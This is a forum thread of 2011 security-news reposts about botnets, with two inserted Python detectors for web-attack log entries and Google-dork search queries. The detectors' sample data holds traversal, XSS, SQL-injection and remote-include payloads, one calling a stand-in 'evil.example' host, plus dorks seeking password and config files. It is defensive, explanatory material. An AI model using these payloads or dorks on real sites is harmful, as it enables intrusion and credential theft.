
Thread: Pandemic of the botnets 2011

  1. #21
    Adviser Team AplusWebMaster
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    TDL-4 botnet - 4.5 million...

    FYI...

    TDL-4 botnet - 4.5 million...
    - https://www.computerworld.com/s/arti...7&pageNumber=2
    June 29, 2011 - "... Kaspersky* estimated that the TDL-4 botnet consists of more than 4.5 million infected Windows PCs. TDL-4's rootkit, encryption and communication practices, as well as its ability to disable other malware, including the well-known Zeus, make the botnet extremely durable... TDL-4's counter-attacks against other malware were another reason it's so successful... TDL-4's makers use the botnet to plant additional malware on PCs, rent it out to others for that purpose and for distributed denial-of-service (DDoS) attacks, and to conduct spam and phishing campaigns. Kaspersky said TDL-4 has installed nearly 30 different malicious programs on the PCs it controls..."
    * http://www.securelist.com/en/analysi...0/TDL4_Top_Bot

    - http://www.securelist.com/en/analysi...7/TDSS_TDL_4#7
    "... TDSSKiller*... detects not only the latest variant of the malware, but its previous versions as well..."
    * http://support.kaspersky.com/faq?cha...&qid=208283363

    - http://isc.sans.org/diary.html?storyid=11146
    Last Updated: 2011-07-03 00:29:34 UTC

    Last edited by AplusWebMaster; 2011-07-03 at 03:48.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #22 (AplusWebMaster)

    Blended attacks hit more Websites

    FYI...

    Blended attacks hit more Websites
    - http://www.informationweek.com/news/...ndly=this-page
    July 25, 2011 - "The average large business's website sees 27 attacks per minute, though attackers - thanks to automation - can create spikes of up to seven attacks per second, or about 25,000 attacks per hour. Those findings come from a new study, conducted by Imperva, of more than 10 million Web application attacks targeting the websites of 30 large businesses and government agencies, launched between January 2011 and May 2011. The study also assessed traffic that flowed via the onion router, better known as TOR, which helps anonymize Web traffic. The study found that the four most prevalent attacks against Web applications were directory traversal (37%), cross site scripting (36%), SQL injection (23%), and remote file include (4%), aka RFI. Attackers often employed those techniques in combination, whether to steal data, surreptitiously install malware on servers, or simply create a denial of service... Overall, most Web application attacks are launched from botnets* involving exploited PCs located in the United States (for 61% of attacks), followed by China (9%), Sweden (4%), and France (2%). But the identity of whoever's behind those attacks, and where they might be based, isn't clear..."
    * http://blog.imperva.com/2011/07/web-...o-minutes.html
    July 25, 2011

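The four attack classes in the Imperva figures quoted in the post above (directory traversal, XSS, SQL injection, RFI) are all visible in an ordinary web-server access log, and so is the "blended" use of several in one request. What follows is an added example, not part of AplusWebMaster's post nor code from the Imperva study: a small Python classifier that URL-decodes each request target (twice, so double-encoded `%252e%252e%252f` payloads are not missed), tags it with the classes it matches, and counts how many requests combine classes. The log lines and the signature patterns are constructed for illustration; the patterns are deliberately simple heuristics, not a WAF ruleset, and will produce false positives on unusual but legitimate input.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample access log (common log format). Not real traffic; each
# attack line mirrors one of the four categories from the Imperva figures.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2011:10:01:02 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
10.0.0.7 - - [12/Jul/2011:10:01:03 +0000] "GET /download.php?file=../../../../etc/passwd HTTP/1.1" 200 1432
10.0.0.8 - - [12/Jul/2011:10:01:04 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 882
10.0.0.9 - - [12/Jul/2011:10:01:05 +0000] "GET /product.php?id=1%27%20UNION%20SELECT%20user,pass%20FROM%20users-- HTTP/1.1" 500 310
10.0.0.10 - - [12/Jul/2011:10:01:06 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 2200
10.0.0.11 - - [12/Jul/2011:10:01:07 +0000] "GET /view.php?f=..%2f..%2fconfig.php&x=%27%20OR%201%3D1-- HTTP/1.1" 200 77
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristic signatures, applied to the decoded path + query string.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|/etc/passwd|boot\.ini)", re.I)
XSS = re.compile(r"(<\s*script|javascript\s*:|on(load|error|click|mouseover)\s*=)", re.I)
SQLI = re.compile(
    r"(\bunion\b[\s/*]+(all[\s/*]+)?select\b"   # UNION SELECT, incl. /**/ spacing
    r"|'\s*(or|and)\s+\S+\s*=\s*\S+"            # ' OR 1=1
    r"|'\s*--|\bsleep\s*\(|\bbenchmark\s*\()",  # comment-out, time-based probes
    re.I,
)
# RFI: a parameter value that is itself a remote URL or a PHP stream wrapper.
RFI_VALUE = re.compile(r"^\s*(https?|ftp)://|^\s*(php|data|expect)://", re.I)


def decode(s, rounds=2):
    """Percent-decode up to `rounds` times; stops early once nothing changes."""
    for _ in range(rounds):
        new = urllib.parse.unquote_plus(s)
        if new == s:
            break
        s = new
    return s


def classify_request(target):
    """Return the set of attack classes found in one request target."""
    path, _, query = target.partition("?")
    decoded_query = decode(query)
    haystack = decode(path) + "?" + decoded_query
    found = set()
    if TRAVERSAL.search(haystack):
        found.add("directory traversal")
    if XSS.search(haystack):
        found.add("xss")
    if SQLI.search(haystack):
        found.add("sqli")
    # RFI is judged per parameter value, not on the whole string, so a path
    # that merely contains "http" somewhere is not flagged.
    for values in urllib.parse.parse_qs(decoded_query, keep_blank_values=True).values():
        if any(RFI_VALUE.search(v) for v in values):
            found.add("rfi")
            break
    return found


def analyse(log_text):
    """Classify every parseable line; return (flagged, per-class counts, blended count)."""
    per_class = Counter()
    flagged = []
    blended = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        classes = classify_request(m["target"])
        if classes:
            flagged.append((m["ip"], sorted(classes)))
            per_class.update(classes)
            if len(classes) > 1:
                blended += 1   # several techniques in one request
    return flagged, per_class, blended


if __name__ == "__main__":
    flagged, per_class, blended = analyse(SAMPLE_LOG)
    for ip, classes in flagged:
        print(ip, ", ".join(classes))
    print(dict(per_class), "blended:", blended)
```

The double decode matters in practice: a single `unquote` leaves `%252e%252e%252f` as `%2e%2e%2f`, which none of the patterns match. The per-parameter RFI check is the other design point; matching `http://` anywhere in the request would flag every referrer-like parameter on the site.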

  3. #23 (AplusWebMaster)

    Cybercrime more costly, more frequent...

    FYI...

    Cybercrime more costly, more frequent ...
    - http://www.darkreading.com/taxonomy/...e/id/231300021
    Aug 02, 2011 - "Cybercrime is not only becoming more frequent - it's becoming more expensive for the victims... In its Second Annual Cost of Cybercrime study*, the Ponemon Institute surveyed 50 large companies to determine the losses and expenditures caused by cybercrime. The study, sponsored by security information and event management company HP ArcSight, indicates that the cost of cybercrime has risen 56 percent since last year's report. "We found that the median annualized cost of cybercrime for 50 organizations in our study is $5.9 million per year, with a range of $1.5 million to $36.5 million each year per company," the study says. Some of the other findings:
    • Cybercrime cost varies by organizational size... smaller organizations incur a significantly higher per capita cost than larger-sized organizations ($1,088 vs. $284).
    • The companies participating in the study experienced 72 successful attacks per week - or more than 1.4 successful attacks per organization. This figure has increased 44 percent over last year...
    • The most costly cybercrimes are those caused by malicious code, denial-of-service, stolen or hijacked devices, and malicious insiders... These account for more than 90 percent of all cybercrime costs...
    • Cyberattacks can get costly if not resolved quickly... The average time to resolve a cyberattack is 18 days, with an average cost of $415,748 over this 18-day period... a 67 percent increase from last year’s estimated average cost of $247,744...
    • Results show that malicious insider attacks can take more than 45 days on average to contain... Information theft accounts for 40 percent of total external costs... disruption to business or lost productivity account for 28 percent of external costs...
    Recovery and detection are the most costly internal activities associated with cybercrime... Recovery and detection account for 45 percent of the total internal activity cost, most of it spent on cash outlays and labor. Having a SIEM system** can help..."
    * http://www.arcsight.com/press/releas...earch-ponemon/

    ** https://secure.wikimedia.org/wikipedia/en/wiki/SIEM


  4. #24 (AplusWebMaster)

    Bitcoin mining bot... controlled via Twitter

    FYI...

    Bitcoin mining bot... controlled via Twitter
    - http://www.f-secure.com/weblog/archives/00002207.html
    August 2, 2011 - "Bitcoin is an electronic currency which is not tied in value to any other currencies. You can convert other currencies (like US dollars) to Bitcoins, or you can mine new Bitcoins by completing complex mathematical tasks. This creates an incentive for botnet masters to use other people's computers to mine bitcoins for them. And we've seen some examples of botnets that try to do this. But now we've found a bot that uses Twitter as the control channel. The bots are created with a generator. The generator sets a specific Twitter account to be the one which can be used to control the mining botnet... We detect bots generated with this generator as Trojan.Generic.KD."


  5. #25 (AplusWebMaster)

    Botnet-driven "Google Dorks" - automated cyber attacks ...

    FYI...

    Botnet-driven "Google Dorks" - automated cyber attacks...
    - http://venturebeat.com/2011/08/16/wa...cyber-attacks/
    August 16, 2011 - "... swarms of compromised computers are being unleashed for the first time on an old kind of vulnerability: Google Dorks. Google Dorks have been around for a while, as the name for an attack where hackers scan web sites, using commonly used links within company networks, to see if there are any unsecure links that can be used to break into a company’s web site. A report being released today by Imperva* warns that the combination of the highly automated botnets and the Google Dorks are a new vector for hackers to break into companies on a massive scale... The botnets can be used with a distributed search tool to find distinguishable resource names and specific error messages that say more than they should. Dorks are often exchanged between hackers in forums. Some of the lists of Dorks are posted on various web sites. Dorks and exploits go hand in hand. In the attack that Imperva observed, the attackers used dorks that match vulnerable web applications and search operators that were tailored to a specific search engine. For each unique search query, the botnet examined hundreds of returned results. All told, the number of queries topped 550,000 queries, including one day with 81,000 queries — all via a single botnet. The attackers targeted e-commerce sites and content management systems. The more success they had, the more the attackers refined their search terms. Imperva saw 4,719 different variations of dorks used in the attacks. Fortunately, there are some solutions that Google, Bing and Yahoo can use to protect against these attacks. Search engines are in a unique position to identify botnets that abuse their services and can thus find out more about the attackers. The search engines can identify unusual queries such as those that contain terms from publicly available Dork databases, or queries that look for sensitive files..."
    * http://blog.imperva.com/2011/08/google-dorks-20.html
    August 16, 2011
    ___

    - http://www.darkreading.com/taxonomy/...e/id/231500104
    Aug 16, 2011

    Last edited by AplusWebMaster; 2011-08-19 at 14:25.
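The article quoted above ends with the defensive angle: a search engine (or any site that exposes a search box) can spot dork-style queries by comparing them with public dork lists and by looking for search operators combined with terms that hunt for sensitive files or error messages. The following is an added example, not from AplusWebMaster's post nor from Imperva's report, that does exactly that over a constructed search-query log: it normalises each query (dropping the `site:` operator that attackers add to aim one dork at one host), scores it, and then groups suspicious queries by client so that a single source issuing several refined variants stands out. The query log, the three-entry dork list and the sensitive-term list are all constructed for illustration; a real deployment would load one of the public dork databases the article mentions.

```python
import re
from collections import defaultdict

# Constructed search-engine query log: "<epoch> <client_ip> <query>". Not real data.
QUERY_LOG = """\
1313452800 198.51.100.4 best pizza near me
1313452801 198.51.100.9 inurl:"/admin/login.php"
1313452802 198.51.100.9 inurl:"/admin/login.php" site:example.org
1313452803 203.0.113.17 filetype:sql "INSERT INTO" "VALUES"
1313452804 203.0.113.17 intitle:"index of" "backup" ext:zip
1313452805 198.51.100.4 how to bake bread
1313452806 203.0.113.17 inurl:wp-config.php.bak
1313452807 203.0.113.18 "Fatal error: Uncaught" ext:php "/var/www"
1313452808 198.51.100.30 inurl:".env" "DB_PASSWORD"
"""

# Illustrative stand-in for a public dork database (normalised form, see normalize()).
KNOWN_DORKS = {
    'inurl:"/admin/login.php"',
    'filetype:sql "insert into"',
    'intitle:"index of" "backup"',
}

# Search operators attackers lean on, and terms that point at sensitive files
# or at verbose error messages that "say more than they should".
OPERATOR = re.compile(r"\b(?:inurl|intitle|intext|filetype|ext|site|allinurl|allintitle):", re.I)
SENSITIVE_TERMS = re.compile(
    r"(?:passw(?:or)?d|\.env\b|wp-config|index of|backup|\.sql\b|\.bak\b"
    r"|fatal error|insert into|/etc/|db_pass)",
    re.I,
)


def normalize(query):
    """Lower-case, drop the site: operator (per-target tailoring), collapse whitespace."""
    q = query.lower()
    q = re.sub(r"\bsite:\S+", "", q)
    return " ".join(q.split())


def score_query(query):
    """Return (score, reasons) for one query; score 0 means nothing dork-like."""
    n = normalize(query)
    reasons = []
    if n in KNOWN_DORKS:
        reasons.append("known dork")
    ops = OPERATOR.findall(n)
    if ops and SENSITIVE_TERMS.search(n):
        reasons.append("operator + sensitive term")
    if len(ops) >= 2:
        reasons.append("multiple operators")
    return len(reasons), reasons


def analyse(log_text, min_suspicious=2):
    """Group suspicious queries by client; return (all per-client hits, suspects)."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        _ts, ip, query = line.split(" ", 2)
        score, reasons = score_query(query)
        if score:
            per_client[ip].append((normalize(query), reasons))
    # A client with several dork-like queries is a candidate for rate limiting
    # or CAPTCHA; the number of distinct normalised queries shows refinement.
    suspects = {ip: hits for ip, hits in per_client.items() if len(hits) >= min_suspicious}
    return per_client, suspects


if __name__ == "__main__":
    _all, suspects = analyse(QUERY_LOG)
    for ip, hits in suspects.items():
        variants = {n for n, _ in hits}
        print(f"{ip}: {len(hits)} dork-like queries, {len(variants)} distinct variants")
        for n, reasons in hits:
            print("   ", n, "->", ", ".join(reasons))
```

The grouping step is the part that scales to the botnet case in the article: 81,000 queries in a day arrive from many bots, so per-client thresholds alone will miss it, but the same normalised query strings recurring across many clients (the `variants` set, aggregated over all sources) is the signal a search engine can act on.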

  6. #26 (AplusWebMaster)

    Rent-a-Bots tied to TDSS Botnet

    FYI...

    Rent-a-Bots tied to TDSS Botnet
    - https://krebsonsecurity.com/2011/09/...o-tdss-botnet/
    September 6, 2011 - "... one of the world’s largest and most sophisticated botnets is openly renting its infected PCs to any and all comers, and has even created a Firefox add-on to assist customers. The TDSS botnet is the most sophisticated threat today... First launched in 2008, TDSS is now in its fourth major version (also known as TDL-4). The malware uses a “rootkit” to install itself deep within infected PCs, ensuring that it loads before the Microsoft Windows operating system starts. TDSS also removes approximately 20 malicious programs from host PCs, preventing systems from communicating with other bot families... when socks.dll is installed on a TDSS-infected computer, it notifies awmproxy .net that a new proxy is available for rent. Soon after that notification is completed, the infected PC starts to accept approximately 10 proxy requests each minute... The service’s proxies are priced according to exclusivity and length of use... The renting of hacked PCs for anonymous surfing is only one of the many ways the TDSS authors monetize their botnet..."
    (More detail at the krebsonsecurity URL above.)

    Some Botnet Statistics ...
    > http://www.abuse.ch/?p=3294


  7. #27 (AplusWebMaster)

    Qbot now Digitally Signed ...

    FYI...

    Qbot now Digitally Signed ...
    - http://blog.eset.com/2011/09/07/back...gitally-signed
    September 7, 2011 - "... Win32/Qbot (a.k.a. Qakbot) is back with new variants of this infamous malware, and this time the binaries are digitally signed. Qbot is a multifunctional trojan that has had some significant impact in the past. It has also been around a while, with the first variants dating as far back as spring 2007, with more massive distribution starting two years later in 2009... Two weeks ago we caught the latest version with our advanced heuristics... the code of this Qbot version has been rewritten, but the functionality remains very similar to the previous versions. As a reminder, Qbot’s main purpose is stealing different types of sensitive information, including:
    • Various user names and passwords
    • Keystrokes
    • Cookies
    • Digital certificates
    • Visited URLs
    • And much more...
    It features a backdoor, which enables the bot to be controlled remotely, update itself, download and run other executables on the infected system. It can also insert malicious IFRAME tags into webpages, has the possibility to block access to domains containing certain keywords (which it uses as an anti-AV feature), and can be used for man-in-the-middle attacks against victims’ online banking systems. Win32/Qbot uses rootkit techniques to hide its presence in the operating system and also has characteristics of a worm, as it can spread through network shares and removable drives..."
    (Screenshots and more detail available at the eset URL above.)


  8. #28 (AplusWebMaster)

    Kelihos botnet shutdown

    FYI...

    Kelihos botnet shutdown
    - https://www.computerworld.com/s/arti...s_off_a_botnet
    September 27, 2011 - "Microsoft has opened a front in its ongoing battle against Internet scammers, using the power of a U.S. court to deal a knockout blow to an emerging botnet and taking offline a provider of free Internet domains. Microsoft used the same technique that worked in its earlier takedowns of the Rustock and Waledac botnets, asking a U.S. court to order Verisign to shut down 21 Internet domains associated with the command-and-control servers that form the brains of the Kelihos botnet... With somewhere between 42,000 and 45,000 infected computers, Kelihos is a small botnet. But, it was spewing out just under 4 billion spam messages per day - junk mail related to stock scams, pornography, illegal pharmaceuticals and malicious software..."

    Operation b79 (Kelihos) and Additional MSRT September Release
    - https://blogs.technet.com/b/mmpc/arc...r-release.aspx
    26 Sep 2011


  9. #29 (AplusWebMaster)

    Chinese DDoS malware || Aldi Bot ...

    FYI...

    Chinese DDoS malware
    - http://asert.arbornetworks.com/2011/...bulletin-2011/
    October 5th, 2011 - "... Our malware stream contains a lot of DDoS bots, many from China*..."
    * http://www.securelist.com/en/blog/20...nese_DDoS_Bots
    "... Over 40 families of Chinese DDoS bots were identified by Arbor Networks and have been tracked over the past year. Online occurrence of the malware itself is increasing. A ton of these families are cropping up all the time, at least a new one every week appears with an unusual new capability... it is difficult to understand or even speculate what the motivation behind the attack may be. Most of the code base is shared, cobbled together, and generally was thrown together by inexperienced writers... One of these families represents the "typical" Chinese DDoS bot: darkshell is a great example of the rudimentary and simple level of network traffic obfuscation, but it's as sophisticated as it gets for these families... The bots use a very basic installation to Windows service and some use http, but most use raw tcp connections to their command and control (CnC) servers residing at 3322 .org or 8866 .org free dynamic dns providers' domains... The Chinese DDoS attack engines that make these bot families unique from other regional bots is the very large set of DDoS attack capabilities maintained in each. Winsock2-based HTTP flood capabilities were the most common of the bots' DDoS capabilities and are used to take down web sites, followed by UDP, TCP and ICMP flood capabilities...yoyoddos is the most active of the DDoS families that they are tracking. The family also maintains the first spot as sustaining the longest attack against a site of these CN DDoS families. This one launched a particular attack for 45 days straight... Chinese web sites are not the only recipients of the DDoS attacks. jkddos tends to go after large, very prominent, financial and investment companies. On 6 different occasions the family was used to DDoS a very large and prominent NYC commercial real estate holding company, and its longest attack was 33 hours. It's a new and somewhat unexpected area of bad online behavior."

    > http://google.com/safebrowsing/diagn...site=3322.org/
    "... Part of this site was listed for suspicious activity 23 time(s) over the past 90 days... Malicious software includes 2040 exploit(s), 1341 trojan(s), 145 backdoor(s)... this site has hosted malicious software over the past 90 days. It infected 254 domain(s)..."
    > http://google.com/safebrowsing/diagn...site=8866.org/
    "... Part of this site was listed for suspicious activity 8 time(s) over the past 90 days... Malicious software includes 162 exploit(s), 77 scripting exploit(s), 38 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 133 domain(s)..."
    ___

    Aldi Bot...
    - http://asert.arbornetworks.com/2011/10/ddos-aldi-bot/
    October 5th, 2011 - "... Aldi Bot is a newer inexpensive DDoS bot that is growing in popularity. Recent data (September 30 2011) suggests that there are at least 50 distinct Aldi bot binaries that have been seen in the wild with 44 unique Command & Control points. We see the bot active in Russia, the Ukraine, the US, and Germany. While it has been stated that Aldi Bot won’t be developed further, the source code has leaked which makes it easy to find and use... All it takes is one bot such as Aldi Bot or other tool such as a Remote Access Trojan (RAT) to provide an attacker a handhold on the inside of an organization that can lead to a much larger security breach... attacks involving the exfiltration of sensitive data typically start with one smaller compromise that is then leveraged for additional access. Additionally Aldi Bot steals passwords, and passwords are often re-used for convenience even though it is a dangerous practice. Without proper monitoring of system and network activity, such infected nodes can be long-lived and pose significant risk... While it has been speculated that Aldi Bot has borrowed from the Zeus banking Trojan source code release in early 2011, Aldi bot is written in Delphi with a PHP back-end, while Zeus is written in C++ with PHP on the back-end. The only obvious similarity between Zeus and Aldi Bot that I can see at first glance is that both of them tend to use a filename called gate.php on the web-based back-end as a “drop zone” to process stolen data."
    - http://www.h-online.com/security/new...ew=zoom;zoom=2

    Last edited by AplusWebMaster; 2011-10-13 at 19:07.

  10. #30 (AplusWebMaster)

    Cybercriminal takedown - Biggest in History...

    FYI...

    Biggest Cybercriminal Takedown in History
    - http://blog.trendmicro.com/esthost-t...wn-in-history/
    Nov. 9, 2011 - "... a long-living botnet of more than 4,000,000 bots was taken down by the FBI* and Estonian police in cooperation with Trend Micro and a number of other industry partners... The botnet consisted of infected computers whose Domain Name Server (DNS) settings were -changed- to point to foreign IP addresses. DNS servers resolve human readable domain names to IP addresses that are assigned to computer servers on the Internet. Most Internet users automatically use the DNS servers of their Internet Service Provider.... a collaboration also led to the arrest of the bad actors responsible for the botnet, despite the fact that the takedown of Rove Digital was complicated and took a lot of effort... Other industry partners did a tremendous job by making sure that the takedown of the botnet happened in a controlled way, with minimal inconvenience for the infected customers..."

    * http://www.fbi.gov/news/stories/2011...malware_110911
    11/09/11 - "Six Estonian nationals have been arrested and charged with running a sophisticated Internet fraud ring that infected millions of computers worldwide with a virus and enabled the thieves to manipulate the multi-billion-dollar Internet advertising industry. Users of infected machines were unaware that their computers had been compromised—or that the malicious software rendered their machines vulnerable to a host of other viruses... DNSChanger was used to redirect unsuspecting users to rogue servers controlled by the cyber thieves, allowing them to manipulate users’ web activity..."
    > (More detail at the FBI URL above.)
    > http://www.fbi.gov/news/stories/2011...alware-graphic

    Video: http://www.symantec.com/avcenter/ref...animation.html

    - https://krebsonsecurity.com/2011/11/...ed-in-estonia/
    Nov. 9, 2011
    ___

    - https://www.us-cert.gov/current/#ope..._click_malware
    November 10, 2011
    ___

    How to check if you are a victim...
    > http://countermeasures.trendmicro.eu...n-ghost-click/
    Nov. 9, 2011

    Last edited by AplusWebMaster; 2011-11-11 at 13:04.
